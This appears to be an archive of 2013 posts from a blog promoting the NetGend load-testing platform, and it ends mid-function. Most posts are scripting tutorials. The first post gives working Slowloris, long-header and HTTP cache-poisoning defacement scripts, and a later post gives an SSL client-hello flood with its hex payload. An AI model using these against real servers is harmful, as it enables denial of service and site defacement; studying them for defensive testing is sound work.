Monday, December 30, 2013

A performance test platform as Low Orbit Ion Cannon


     Network security has gained a lot of attention over the years and has become one of the top reasons that keep a web site owner awake at night.   In this blog, we are going to talk about how NetGend, a performance test platform, can help with security testing.

     By nature, any powerful performance test platform can be turned into a DDoS testing platform.   The NetGend platform, with its ability to emulate 50,000 concurrent virtual clients on one box, is no exception.  Compared to the famous DDoS tool LOIC (Low Orbit Ion Cannon, a cool name!), NetGend can support more concurrent sessions and a more realistic emulation of clients.

    On the NetGend platform, sophisticated clients are emulated with a JavaScript-like script.  Unlike LOIC, which can only send simple messages, NetGend can send dynamic messages with lots of moving parts (i.e., variations in the messages) and, on top of that, it can engage with the server under test through complex interactions, just as good clients do.    In DDoS testing, it can really cause some pain on web servers.

     First let's try to cause a buffer overflow with a long HTTP header.  In the following script, we use the built-in function "repeat" to create a "Referer" header that is 20,000 bytes long:
 function VUSER() { 
      httpHeader.Referer = repeat("A", 20000);  
      action(http, "http://www.example.com");  
 }  

     Similarly, you can add more long HTTP headers, such as "XYZ":
    httpHeader.XYZ = repeat("A", 30000);  

     Creating HTTP requests with long headers is quite easy.  Let's look at the Slowloris attack, which has become a popular attack against servers.  Here an attacker causes DoS on a web server by sending HTTP requests very slowly, exhausting all resources (connections) on the server.  The original script is quite long.   Here we can do a simpler version in a few short lines:
 function VUSER() { 
      connect("www.example.com", 80); 
      http.POSTData = "name=jin&pass=123";  
      a = createHttpRequest("http://www.example.com/");  
      for (i = 0; i < length(a); i ++ ) {  
           send(substr(a, i, 1));  
           sleep(5000);  
      }  
 }  

   In the above script, we create a connection to the web server, build a valid HTTP POST request, and send it one character at a time, waiting 5 seconds between characters. By spawning many VUsers (up to 50,000), we will chew up all the connection resources on a server.
 
    The above two examples are quite simple in concept.  To conclude our blog, let's look at an example where lots of creativity was involved in crafting a special HTTP request with malicious intention. Kudos to the researcher(s) who found it.  This attack is called "HTTP cache poisoning" and is documented here.

    This is an attack on the HTTP cache server. The following diagram from a blog by Bertrant Baquet shows the position of an HTTP cache server.  In normal operation, when an HTTP cache server receives a request, it searches its cached transactions.  If it finds one, it sends the response from the cache; otherwise, it forwards the request to the web server and then sends the web server's response back to the client side.
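
    The normal cache behavior described above can be sketched in a few lines of Python. This is only an illustration of the hit/miss logic, not how any real cache server is implemented; the names make_cache and fake_origin are made up for this example, and the "web server" is a plain function.

```python
from typing import Callable, Dict, List

def make_cache(fetch_from_origin: Callable[[str], str]) -> Callable[[str], str]:
    """Return a request handler that answers from a cache when it can."""
    cache: Dict[str, str] = {}

    def handle(url: str) -> str:
        if url in cache:                 # cache hit: answer without asking the origin
            return cache[url]
        body = fetch_from_origin(url)    # cache miss: forward to the web server
        cache[url] = body                # remember the response for next time
        return body

    return handle

# Hypothetical stand-in for the real web server.
origin_calls: List[str] = []

def fake_origin(url: str) -> str:
    origin_calls.append(url)
    return f"<html>page for {url}</html>"

handle = make_cache(fake_origin)
first = handle("/index.html")    # miss, goes to the origin
second = handle("/index.html")   # hit, served from the cache
print(len(origin_calls))         # prints 1
```

    Whatever ends up stored under a URL is what every later client receives, which is why the content of the cache is worth protecting.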

     The idea of the attack is to send one request from the client and make the server's response appear to be two responses from the cache server's point of view.   This attack will work, for example, when the web server has a dynamic page that will redirect based on the incoming URL.   For example, when the incoming request is the following
http://www.example.com/redirect?page=http://www.test.com 
it will send a 302 response with the "Location" header being "http://www.test.com".    By cleverly crafting a message in place of the highlighted part, the attacker (on client side) can control what the server sends.

     In the following script, the specially crafted message (called "poison") is in bold.  We use the function "toUrl()" to escape it so it can be included as part of the URL.
 function VUSER() {  
      connect("www.example.com", 80);
      httpHeader.Pragma = "no-cache";
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg); //turn off cache
      poison = "
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2015 14:50:18 GMT
Content-Length: 21
Content-Type: text/html

<html>defaced!</html>";
      poison = toUrl(poison);
      msg = createHttpRequest("http://www.example.com/redir.php?page=${poison}");
      send(msg); //add the poison
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg);
}

    As a result, the HTTP cache server will put <html>defaced!</html> as the cached response for the home page!

    From a web server owner's point of view, both security and performance are important.  Isn't it nice to have one platform that can test both?

Friday, December 27, 2013

How to resume an interrupted performance test



    Recently I read an interesting blog on "Handling consumable parameter data in LoadRunner" by Stu, a veteran of performance testing.  Even though it's about LoadRunner, the underlying problem applies to all performance test platforms.

    The problem comes up naturally when you run performance tests. Think about this scenario: you have a CSV file with 100,000 users and you need to register these users.  Halfway through, there is a problem or you need to leave, so the test has to be stopped.  When you come back to continue the test, you need to resume from where you left off. You can make a note (or a mental note) of where the test stopped, but that's cumbersome, especially when you have to start and stop the test multiple times.

    Stu's blog gave multiple creative solutions; however, none of them is quite simple, due to the design limitations of LoadRunner.  On NetGend, we have the concept of a "permanent" variable, and it solves the problem nicely.   A variable is "permanent" if its value is stored in a permanent place (like a file).  So even after the test program has stopped, the value of the variable is still there.  When you run the test again, the "permanent" variable continues with the value left from the previous run.

    Permanent variables are created with the "createPermVar()" function.   It takes two parameters: the first is the name of the permanent variable, and the second is the name of the file that stores its value.

 createPermVar( <variableName>, <fileName>);  

    Here is a simple example that shows how to use it. The file "users.csv" contains rows of usernames and passwords.

 function userInit() {  
      createPermVar(index, "perm.txt");  
      var allUsers = fromCSV("users.csv");  
 }  
 function VUSER() {  
      x = getNext(allUsers, index);  //x[0] is username, x[1] is password
      index ++;  
      http.POSTData = "username=${x[0]}&password=${x[1]}";  
      action(http, "http://www.example.com/register");  
 }  

    In the above script, the variable "index" is a permanent variable.  Whenever its value changes (for example, by   index ++), the new value is implicitly stored in a file.

    If the file (in this case "perm.txt") doesn't exist, the permanent variable ("index" in this case) will have an initial value of 0 (when used as an index, it refers to the first element in an array) and the file will be created.
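
    For readers who want to see the idea outside of NetGend, here is a minimal Python sketch of a file-backed counter. It is not how createPermVar() is implemented (that is not described in this blog); the class name PermVar and its methods are made up for illustration, and this naive version rewrites the file on every change.

```python
import os
import tempfile

class PermVar:
    """A counter whose value survives restarts because it lives in a file."""

    def __init__(self, path: str) -> None:
        self.path = path
        if os.path.exists(path):
            # Resume with the value left by the previous run.
            with open(path) as f:
                self._value = int(f.read().strip() or 0)
        else:
            # First run: start at 0 and create the file.
            self._value = 0
            self._save()

    @property
    def value(self) -> int:
        return self._value

    def increment(self) -> None:
        self._value += 1
        self._save()          # every change is written back immediately

    def _save(self) -> None:
        with open(self.path, "w") as f:
            f.write(str(self._value))

# Simulate two runs of a test that share the same file.
path = os.path.join(tempfile.mkdtemp(), "perm.txt")
index = PermVar(path)         # first run starts at 0
index.increment()
index.increment()
resumed = PermVar(path)       # "second run" picks up where the first stopped
print(resumed.value)          # prints 2
```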

     You may be concerned about the performance impact of storing a value to a file - we all know writing to a file can be slow, especially because of disk seeks.  Rest assured, storing values in our case is actually very fast!  Our performance evaluation of this operation shows that we can achieve 2,000,000 operations per second on a slow PC.

     Now you see how the "permanent" variable works.  Does your favorite test platform have this feature?

Wednesday, December 25, 2013

Random element in an array


    In performance testing, we sometimes need to deal with a list of values.  For example, when we test an e-commerce web site, we may need to extract a list of products from a page.  With the list/array extracted, we can do operations such as randomly picking an item to view or to add to the cart.  On some platforms, this logically simple operation can be a daunting job.

    I saw an interesting blog by Howard Clark on testing PeopleSoft Financials 9.0 using LoadRunner: "Randomly Selecting an Array of Values and Using That Value As A Parameter".  Here is the script to pick a random BUID, copied from that blog. It's listed here just to show how complex it is - you don't have to read it.

 int TotalNumberOfBUIDs;  
 char TotalNumberOfBUIDschar[3]; //working variable  
 char *AvailableBUIDsparam; //working variable  
 web_reg_save_param("AvailableBUIDs",  
 "LB/IC=class='PSSRCHRESULTSODDROW' >",  
 "RB/IC=",  
 "Ord=All",  
 "Search=Body",  
 "RelFrameId=1",  
 "Notfound=error",  
 LAST);  
 TotalNumberOfBUIDs=atoi(lr_eval_string("{AvailableBUIDs_count}"));  
 TotalNumberOfBUIDs = rand() %TotalNumberOfBUIDs;  
 lr_output_message("%d", TotalNumberOfBUIDs);  
 itoa(TotalNumberOfBUIDs, TotalNumberOfBUIDschar, 10); //working variable conversion  
 lr_save_string(TotalNumberOfBUIDschar, "BUIDindex");  
 AvailableBUIDsparam = lr_eval_string("{AvailableBUIDs_{BUIDindex}}");  
 lr_save_string(AvailableBUIDsparam, "BUIDs");  
 lr_save_string((lr_eval_string(lr_eval_string("{BUIDs}"))), "BUID");  
 "Name=VCHR_ERRC_WRK_BUSINESS_UNIT", "Value={BUID}", ENDITEM, //application of the value that was captured and then randomized  

    While I was impressed by the author's skills in C, I couldn't help wondering how an average test engineer could do this.  They know their test subject well, but writing such a complex C program can be well over their heads.   On the NetGend platform, it's so much easier.

 AvailableBUIDs = substring(str, "class='PSSRCHRESULTSODDROW' >", "<", "all");  
 TotalNumberOfBUIDs = length(AvailableBUIDs);
 BUIDindex = randNumber(0, TotalNumberOfBUIDs-1); //indexing is 0 based  
 BUID = AvailableBUIDs[BUIDindex];  //variable "BUID" now contains a random value.

    Even though we tried to use the same variable names as in the LoadRunner script, our script is still much shorter and easier to understand.  Here are some of the reasons for the simplicity:
  • In a NetGend script, all variables are local to an instance/VUser.  There is no need to use an API to get the value of a variable (called a "parameter" in LoadRunner) into code space or to write the value back to the variable after some operations in the code space.
  • NetGend supports the array variable.  In this case, the variable "AvailableBUIDs" holds the array of extracted BUIDs.
  • You can get the length of the array by the function "length()".
  • You can get any element in the array by indexing using [].  For example: AvailableBUIDs[BUIDindex] gives the value of "BUIDindex+1"th element. (it's 0 based)
    Note that the above short script (4 lines) can be made even shorter.   The readability may suffer a little bit but it's still fairly easy to understand. 
 AvailableBUIDs = substring(str, "class='PSSRCHRESULTSODDROW' >", "<", "all");  
 BUID = AvailableBUIDs[randNumber(0,length(AvailableBUIDs)-1)];  
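
    For comparison, the same "extract all, then pick one at random" idea looks like this in plain Python. The HTML fragment and the BUID values (US001 and so on) are invented for this sketch; only the class name comes from the scripts above.

```python
import random
import re

# Made-up page fragment; the real PeopleSoft page is not shown in this blog.
html = (
    "<td class='PSSRCHRESULTSODDROW' >US001</td>"
    "<td class='PSSRCHRESULTSODDROW' >US002</td>"
    "<td class='PSSRCHRESULTSODDROW' >US003</td>"
)

# Capture everything between the left boundary and the next "<".
available_buids = re.findall(r"class='PSSRCHRESULTSODDROW' >([^<]*)<", html)

# random.choice picks one element uniformly, so no index arithmetic is needed.
buid = random.choice(available_buids)
print(available_buids, buid)
```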

    A good performance test platform needs to make complex test scenarios simple, not the other way around.

Monday, December 23, 2013

Performance testing in the ocean


  Vacation by cruise ship is pleasant. You get to see beautiful places, eat great food and experience fun events -- all for a low price.  I am not working for a cruise line, but I love taking cruises so much that I can't help speaking like one :-)   Cruising is not without its problems, and one of them is internet access.  We are not talking about checking the internet every hour or every minute for news, emails etc.  After all, you are on the cruise ship for fun.  But many guests do need to share their pictures and stories with their friends and stay connected.

   So what's the issue with internet access on a cruise ship? It's slow and expensive - some plans cost around $0.75/min.  Internet access on land goes through cable, DSL or wireless links, but on a cruise ship it has to go through a satellite link.  That's the fundamental reason why it's slow and yet expensive. I can understand this.   But I can't understand why the login process is so slow - it can take dozens of seconds.  The servers needed for the login process are all on the ship, and the information needed is simple - just a username and password.  So my guess is that the server software has not been thoroughly tested for performance.

    If you are wondering whether there is a need to do performance testing on a cruise ship,  consider the following facts:

  • There are close to 4000 guests on ship,  many with smartphones, tablet PCs or laptops,
  • Many probably will try internet access between two events (for example, the time between two shows),   
  • users have to log in and log off multiple times -  login to check out some emails, go offline to avoid the high per-minute charge, compose responses and log back in to send them. 

    I took a quick look at how I would performance-test it.  The login process itself is pretty simple - just sending the following HTTP POST data to the server (UserID and Password changed for anonymity).
 //the following are the HTTP POST data sent to server during login
 FRM_VERB:FRM_VERB_LOGIN  
 hdnPageName:WIRELESS_LOGIN  
 UserID:jsmith  
 Pass:abc123  
 Image1.x:18  
 Image1.y:30  
    Note that there are 4 hidden fields in the form.

    If I were testing it using NetGend platform,  I could use the following script to test it out.  In a nutshell, here is what the script does:
  • In the userInit() part, it preloads a CSV file; each of its rows contains a username and password. 
  • In VUSER() part,  it will get the login page.  Then it will "fill" the form with a pair of username and password read from the csv file and do the "login".
  • Finally it will logout.
 function userInit() {  
      var db = fromCSVFile("users.txt");  
      var index = 0;  
 }  
 function VUSER() {  
      action(http,"http://10.10.10.10/login.asp");  
      a = db[index];  
      index ++;  
      info.UserID = a[0];  
      info.Pass = a[1];  
      http.POSTData = fillHtmlForm(http.replyBody, info);  
      action(http,"http://10.10.10.10/login.asp"); 
      x = randNumber(30000, 600000); //sleep randomly from 30 to 600 seconds (10min)
      sleep(x);
      action(http,"http://10.10.10.10/logoff.asp");
 }  

   Observant readers may notice that the script doesn't deal with the "hidden" fields when it sends the HTTP POST data for login. That's because the function "fillHtmlForm()" takes care of hidden parameters, so users don't have to set up complex regular expressions (or something equivalent) to capture the hidden parameters and put them back in the HTTP POST data.
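
   To make the idea concrete, here is a rough Python sketch of what a form-filling helper could do: collect every input field from the login page (hidden ones included), overlay the values the user supplies, and encode the result. This is an assumption about the general technique, not the actual implementation of fillHtmlForm(); the function name fill_html_form and the sample login page are made up for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode

class InputCollector(HTMLParser):
    """Collect name/value pairs of all <input> tags, hidden ones included."""

    def __init__(self) -> None:
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        name = attributes.get("name")
        if name:
            # Inputs without a value attribute start out empty.
            self.fields[name] = attributes.get("value") or ""

def fill_html_form(html: str, values: dict) -> str:
    collector = InputCollector()
    collector.feed(html)
    fields = dict(collector.fields)   # hidden fields keep their page values
    fields.update(values)             # user-supplied values override
    return urlencode(fields)

# Hypothetical login page, loosely modeled on the POST data shown earlier.
login_page = """
<form method="post" action="login.asp">
  <input type="hidden" name="FRM_VERB" value="FRM_VERB_LOGIN">
  <input type="hidden" name="hdnPageName" value="WIRELESS_LOGIN">
  <input type="text" name="UserID">
  <input type="password" name="Pass">
</form>
"""

post_data = fill_html_form(login_page, {"UserID": "jsmith", "Pass": "abc123"})
print(post_data)
# FRM_VERB=FRM_VERB_LOGIN&hdnPageName=WIRELESS_LOGIN&UserID=jsmith&Pass=abc123
```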

   The need for performance testing is everywhere,  you just can't escape it - even in the middle of the ocean.

Saturday, December 14, 2013

Fun with Performance test platform


    In previous blogs, we showed that the NetGend application performance test platform can be used for business - web service performance testing.   This blog covers a story about using it to do something fun.

    It started with my upcoming cruise vacation.  I planned to bring my running shoes and go to the gym every afternoon - how else can I deal with so much good food?  I used to listen to the NPR radio station while running, but in the middle of the ocean there would be no radio or high speed internet, so my only choice would be podcasts.  My favorite is Marketplace from APM.

    I searched the APM web site but didn't find the list of podcasts - the best I could find was the podcast for yesterday.  Eventually Google brought me to this page in the Apple iTunes store.  It seemed promising.

     Unfortunately I didn't have iTunes installed on my Ubuntu PC and didn't intend to install it only to download these podcasts for my cruise vacation.   While being a little disappointed, I noticed that the HTML page had something that looked like URLs for the podcasts (see the audio-preview-url attributes in the following).   I copied and pasted one of the values into my browser's address bar and, yes, that was exactly what I had been looking for!

 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/bFRhvGqQpxg/marketplace_podcast_20131211_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-11-13 Marketplace - Certainty?" adam-id="209223815" row-number="0" class="podcast-episode">  
 ....  
 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/o6MbaCEnmbU/marketplace_segment24_20131210_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-10-13 Marketplace - Volcker? He rules!" adam-id="207293711" row-number="1" class="podcast-episode">  
 //more than 20 of them

    To grab all the values of this attribute, we needed to use an XPath like //tr/@audio-preview-url. Luckily it's supported by NetGend. So I wrote a simple script to get all the URLs for the podcasts. Downloading a podcast and writing it to disk is pretty simple.
 function VUSER() {   
      action(http, "https://itunes.apple.com/us/podcast/apm-marketplace/id201853034");  
      a = fromHtml(http.replyBody, '//tr/@audio-preview-url');  
      for (i = 0; i < getSize(a); i ++) {  
           if (match(a[i], /\/([^\/]+)$/)) {  //extract the file name from URL
                fileName = g1;  //g1 holds the first captured group
                println("downloading ${a[i]}");  
                action(http, a[i]);  //download the i-th URL
                writeFile(fileName, http.replyBody);  
           }  
      }  
 }   
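
    The extraction step can also be sketched with Python's standard library, for readers without access to NetGend. The sketch below works on a small inline fragment (trimmed from the two rows shown above) instead of downloading the real page, and it only computes the file names; the class name PreviewUrlCollector is made up.

```python
import re
from html.parser import HTMLParser

class PreviewUrlCollector(HTMLParser):
    """Gather the audio-preview-url attribute of every <tr> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            url = dict(attrs).get("audio-preview-url")
            if url:
                self.urls.append(url)

# Two rows trimmed from the page source quoted in this post.
page = (
    '<table>'
    '<tr kind="episode" audio-preview-url="http://feeds.americanpublicmedia.org/'
    '~r/MarketplacePodcast/~5/bFRhvGqQpxg/marketplace_podcast_20131211_64.mp3"></tr>'
    '<tr kind="episode" audio-preview-url="http://feeds.americanpublicmedia.org/'
    '~r/MarketplacePodcast/~5/o6MbaCEnmbU/marketplace_segment24_20131210_64.mp3"></tr>'
    '</table>'
)

collector = PreviewUrlCollector()
collector.feed(page)

# Same idea as the regular expression in the script: keep what follows the last "/".
file_names = [re.search(r"/([^/]+)$", url).group(1) for url in collector.urls]
print(file_names)
# ['marketplace_podcast_20131211_64.mp3', 'marketplace_segment24_20131210_64.mp3']
```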

   Running this gave me the podcasts, which I then transferred to my smartphone.  I was filled with joy - on the one hand, I got the podcasts I needed; on the other hand, I realized that this test platform can also be used for something other than testing!    I know there may be other tools that can do the above, but can you imagine a performance test platform doing it so easily?

Thursday, December 12, 2013

How bad is a security threat?




    Recently I met my friend Percy, who is a technical guru I respect.  Our talk inevitably moved on to something technical on SSL - how many SSL handshakes can a server support.  He sent me an interesting security threat report of DDoS on HTTPS servers.

    This report indicates that HTTPS servers may suffer from SSL renegotiation attacks thanks to the THC tool.  Even if renegotiation is turned off, the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol.  So it remains an attack vector.

    To get an idea of how bad the server CPU exhaustion can be, I started Wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake process.  An SSL handshake involves multiple steps; in the first step, the client side sends a client-hello message to the server side.   According to Wireshark, just replying to a client-hello message causes the server to do 5ms' worth of intensive computation (my server has an AMD quad-core CPU:  Athlon II X4 645, 3.1 GHz).

    Our NetGend platform can set up tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side and yet keep the server busy.   Some SSL handshaking steps may still cause the client side to do some nontrivial computation, so it's better to send a canned client-hello message, which costs the client almost no computing time.

    First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".

 16 03 01 00 cc 01 00 00 c8 03 01 52 a2 93   
 34 0b 60 fd c9 59 ba 0c 8a 38 cc c7 b4 96 fa 50   
 09 cc 46 f2 40 2b e1 12 e7 99 3e 98 25 00 00 5a   
 c0 14 c0 0a 00 39 00 38 00 88 00 87 c0 0f c0 05   
 00 35 00 84 c0 12 c0 08 00 16 00 13 c0 0d c0 03   
 00 0a c0 13 c0 09 00 33 00 32 00 9a 00 99 00 45   
 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07   
 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14   
 00 11 00 08 00 06 00 03 00 ff 02 01 00 00 44 00   
 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 01 00   
 02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00   
 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00   
 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00   
 23 00 00   
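
    As a quick sanity check on a dump like this, the first nine bytes can be decoded by hand or with a few lines of Python. The sketch below only parses the record and handshake headers from the first line of the dump above; the variable names are my own.

```python
# First nine bytes of the captured message, copied from the dump above.
hex_text = "16 03 01 00 cc 01 00 00 c8"
data = bytes.fromhex(hex_text)   # spaces between byte pairs are skipped

content_type = data[0]                                # 0x16 (22) = handshake record
version = (data[1], data[2])                          # (3, 1) = TLS 1.0 / SSL 3.1
record_length = int.from_bytes(data[3:5], "big")      # bytes following the 5-byte record header
handshake_type = data[5]                              # 1 = client-hello
handshake_length = int.from_bytes(data[6:9], "big")   # bytes following the 4-byte handshake header

print(content_type, version, record_length, handshake_type, handshake_length)
# 22 (3, 1) 204 1 200
```

    The record length of 204 plus the 5-byte record header gives 209 bytes, which matches the number of bytes in the dump.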

   Then we create the following script to run on the NetGend platform.
 function userInit() {  
      var data = readFile("clientHello.txt");  
      data = fromHexString(data);  //this will convert hex bytes to binary data
 }  
 function VUSER() {  
      connect("10.3.0.3", 443);  
      send(data);  
      recv(msg);  
      //close() is unnecessary, the connection will be closed at the end of VUser.
 }  

     The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz), but when it sends client-hello messages at a rate of about 2900/second (over multiple connections), the server side is almost completely busy (see the CPU idle percentage, 0.3%id, in the output below).
 Tasks: 265 total,  2 running, 260 sleeping,  0 stopped,  3 zombie  
 Cpu(s): 81.8%us, 15.0%sy, 0.0%ni, 0.3%id, 0.0%wa, 0.0%hi, 2.8%si, 0.0%st  
 Mem: 16177816k total, 14040884k used, 2136932k free,  524640k buffers  
 Swap: 3929084k total,    0k used, 3929084k free, 9915940k cached  
  PID USER   PR NI VIRT RES SHR S %CPU %MEM  TIME+ COMMAND                     
 18152 www-data 20  0 1961m 4008 1248 S  61 0.0  6:28.21 /usr/sbin/apache2 -k start            
 18462 www-data 20  0 1961m 4012 1248 S  61 0.0  0:41.27 /usr/sbin/apache2 -k start            
 18578 www-data 20  0 1961m 3984 1136 S  60 0.0  0:06.15 /usr/sbin/apache2 -k start            
 18151 www-data 20  0 1961m 4008 1248 S  59 0.0  6:26.73 /usr/sbin/apache2 -k start            
 18354 www-data 20  0 1961m 4644 1592 S  59 0.0  4:10.70 /usr/sbin/apache2 -k start            
 18490 www-data 20  0 1961m 3964 1104 S  59 0.0  0:40.16 /usr/sbin/apache2 -k start     
 17227 admin    20   0 3470m 2.2g 2.2g S   32 14.1  18:15.93 /usr/lib/vmware/bin/vmware-vmx -ssnapshot.num
    The VM process used to take 10% CPU on one core; it takes much more now due to the CPU resource contention.   While I can still use a real browser to access HTTPS pages, it's clear that the server is VERY busy.

    So, it's good to be aware of a possible security threat, and it's even better to get some idea of how bad it can be - peace of mind matters.  NetGend can give you that peace of mind.

Tuesday, December 10, 2013

Performance testing on REST API


    RESTful APIs hold great promise for simplifying the development of web/smartphone apps and for handling a larger number of clients.  How can we effectively test servers that support RESTful APIs?

   To load-test a RESTful service, we need to be able to generate HTTP requests with methods like "PUT", "DELETE" etc.  You are right, they may not be as familiar as GET and POST, but on the NetGend platform it's easy to emulate just about any HTTP method:

 http.method = "PUT";  
 //or  
 http.method = "DELETE";  

    Note that by default, the HTTP method is "GET" on the NetGend platform.  If you need the HTTP POST method, you can simply set it:
 http.method = "POST";  
 //or just specify there is http POST data.  
 http.POSTData = "name=john&city=houston";  

    When you generate HTTP Body in JSON format (say for HTTP Post message),  you can either use a template or use the function combineHttpParam.
 http.POSTData = q|{ "name": "john", "city": "Houston", "age": "23"}|;  
 //or  
 person.name = "john";  
 person.city  = "Houston";  
 person.age  = 23;  
 http.POSTData = combineHttpParam(person);  

    Did you notice that you don't have to escape the double-quotes in the template?   On other test platforms you may have to write { \"name\": \"john\", \"city\": \"Houston\", \"age\": \"23\"}.  If you think escaping is a pain, you are not alone!  Now you understand why I think it's a pleasure to do it on the NetGend platform.
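
    In general-purpose languages, the usual way to avoid hand-escaping is to build the data structure first and let a JSON library serialize it. A small Python illustration, using the same sample person as above:

```python
import json

# Build the data as a dictionary; no quotes need to be escaped by hand.
person = {"name": "john", "city": "Houston", "age": "23"}

body = json.dumps(person)   # the library produces the quoting
print(body)
# {"name": "john", "city": "Houston", "age": "23"}
```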

    The URL path for a RESTful request may look like the following:
/rest/8af909ffefa9/getDistance.json/10001/20002/mile.  It can be generated in two ways.

 //method 1, by variable substitution 
 /rest/${apiKey}/getDistance.json/${zip1}/${zip2}/${unit}  
 //assume you have the variables defined  
or
 //method 2, by joining an array
 a[0] = apiKey;  
 a[1] = "getDistance.json";  
 a[2] = zip1;  
 a[3] = zip2;  
 a[4] = "mile"; //can have other unit  
 apiMsg = join(a, "/");  
 action(http, "http://www.example.com/rest/${apiMsg}");  
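
    The "join an array" approach carries over directly to other languages. Here is a short Python sketch; the function name rest_path is made up, and percent-encoding each segment with quote() is my own addition to keep unusual characters from breaking the path.

```python
from urllib.parse import quote

def rest_path(api_key, zip1, zip2, unit="mile"):
    """Join the path segments with "/", percent-encoding each one."""
    parts = [api_key, "getDistance.json", zip1, zip2, unit]
    return "/rest/" + "/".join(quote(str(part), safe="") for part in parts)

path = rest_path("8af909ffefa9", 10001, 20002)
print(path)
# /rest/8af909ffefa9/getDistance.json/10001/20002/mile
```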

    HTTP responses from RESTful services are increasingly in JSON format.  Parsing a JSON message is pretty simple on the NetGend platform and has been covered many times in previous blogs.  The following is an example of a JSON message from a site that implements a "todo" list.

 [ {"id": 1,  
     "text": "reserve lunch"  
    }, {"id": 2,  
     "text": "fix mower"  
    }, {"id": 3,  
     "text": "buy grocery"  
    }]  

     Let's put all these together and try to test the RESTful site for "todo" list by implementing the following sequence.
  • Get a list of existing "todos"
  • randomly delete one of them
  • add a new one 
  • update a random "todo"

 action(http, "http://www.example.com/todos/"); 

 //delete a random one 
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{"id": ${id}}|;  
 http.method = "DELETE";  
 action(http, "http://www.example.com/todos");  

 //add a new one  
 http.method = "POST";  //set explicitly, in case "DELETE" from the previous step is still in effect
 http.POSTData = q|{"text": "talk to insurance agent"}|;  
 action(http, "http://www.example.com/todos");  

 //update
 action(http, "http://www.example.com/todos/");  
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{ "text": "updated content!", "id": ${id}}|;  
 http.method = "PUT";  
 action(http, "http://www.example.com/todos");  
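
    One detail worth watching in a sequence like this is which "id" gets picked: after a delete, the ids in the list are no longer guaranteed to run from 1 to the list size. The Python sketch below shows one way to pick an id that really exists. It only builds the requests with urllib (nothing is sent), and the helper name build_request is made up.

```python
import json
import random
import urllib.request

BASE = "http://www.example.com/todos"

def build_request(method: str, payload: dict) -> urllib.request.Request:
    """Build (but do not send) a JSON request with the given HTTP method."""
    data = json.dumps(payload).encode("utf-8")
    return urllib.request.Request(
        BASE, data=data, method=method,
        headers={"Content-Type": "application/json"},
    )

# The sample "todo" list shown earlier in this post.
todos = json.loads(
    '[{"id": 1, "text": "reserve lunch"},'
    ' {"id": 2, "text": "fix mower"},'
    ' {"id": 3, "text": "buy grocery"}]'
)

# Delete: choose an entry from the list, so the id is known to exist.
victim = random.choice(todos)
delete_req = build_request("DELETE", {"id": victim["id"]})

# Add a new one.
add_req = build_request("POST", {"text": "talk to insurance agent"})

# Update: choose among the entries that were not deleted.
remaining = [t for t in todos if t["id"] != victim["id"]]
target = random.choice(remaining)
update_req = build_request("PUT", {"id": target["id"], "text": "updated content!"})

print(delete_req.get_method(), add_req.get_method(), update_req.get_method())
# DELETE POST PUT
```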

    There are obviously more test scenarios, and I am sure they will feel just as pleasant as this one!

Sunday, December 8, 2013

goto considered helpful (in some cases)!


    There are occasional debates on whether it's good to have "goto" statements in a program or even in a programming language.  The typical argument by a proponent is a little weak:  "goto" can help jump out of a nested loop. As far as I can see, the proponents are typically on the losing side.    Sadly, I am one of them.  In this blog, we are going to present a better argument: using "goto" can be natural for a certain audience in some cases.

    Some developers may argue that we can use "if", "while" etc. to accomplish what "goto" statements can do.    Yes, that's true, but it doesn't feel natural and easy for our audience: those without a lot of programming background.  "goto" (or jump) feels more familiar to them.

   On the NetGend test platform, we use JavaScript syntax. It may appear that it's impossible to support "goto" since the JavaScript language itself doesn't support it.  We came up with the following way around it. To set a label, you call the function "setLabel(<labelName>)"; to jump to a label, you call "goto(<labelName>)".

    Here is a simple example to illustrate how it is used.
  function VUSER() { 
      id = 2; 
      println("start");  
      setLabel("test1");  // <--- set the label here
      println("hello"); 
      id --; 
      if (id > 0) {  
            goto("test1"); // <--- jump to label
      }  
      println("world");
 }  

    In this example, the println("hello"); statement will be executed twice (the second time is due to the "goto" statement).  The output is
 start  
 hello  
 hello  
 world  

    Now let's look at an example that's a little more realistic:  we need to emulate sensors trying to register with a master. Master node may ask a sensor node to wait a little bit and try again.

 function VUSER() {
       connect("1.1.1.1", 12345);  
       setLabel("register");  
       send("register by ${userId}");  
       recv(response);  
       if (match(response, /please wait (\d+) ms/)) {  
          sleep(g1);  
          goto("register");  
       }  
       //now send data to master 
}

    It's true that the above logic can be done with a while loop, but it's much easier for a test engineer to understand the logic if we use "goto" here.
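
    For readers who want to compare the two styles, here is what the loop version of the same retry logic might look like in Python. The master node is faked with a canned list of replies and the sleep function is injected so the sketch runs instantly; the function name register and its parameters are made up for this example.

```python
import re

def register(send_and_receive, sleep, user_id):
    """Keep registering until the master stops asking us to wait."""
    attempts = 0
    while True:
        attempts += 1
        response = send_and_receive(f"register by {user_id}")
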